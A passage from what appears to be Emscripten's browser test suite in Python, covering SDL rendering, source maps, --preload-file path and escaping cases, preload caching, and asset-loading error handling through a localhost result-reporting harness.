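# support_byte_ranges is set, honouring HTTP Range requests so that
# chunked synchronous XHR can be exercised.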
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
requires_graphics_hardware = unittest.skipIf(os.environ.get('EM_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.environ.get('EM_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test verifies behavior that will be deprecated at some point in the future; remove it once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named test_zzz_* so that it runs last, since it may take
# focus away from the main test window by opening a new window and
# possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding a directory that should be excluded and must not appear on the VFS.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that output files containing single or double quotes are handled by correctly escaping their names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
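# Build a shell page whose window.onerror reports 1 to the harness when
# the error mentions the missing test.data file; assetLocalization is the
# prefix that Module.locateFile prepends to non-wasm asset paths.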
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test: a missing file should run xhr.onload with a status other than 200, 304 or 206
setup("")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
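# Inject reftest.js into the generated test.html and defer window.close()
# so the canvas has rendered before the reference image comparison runs.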
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for requestAnimationFrame callbacks to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the test above, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
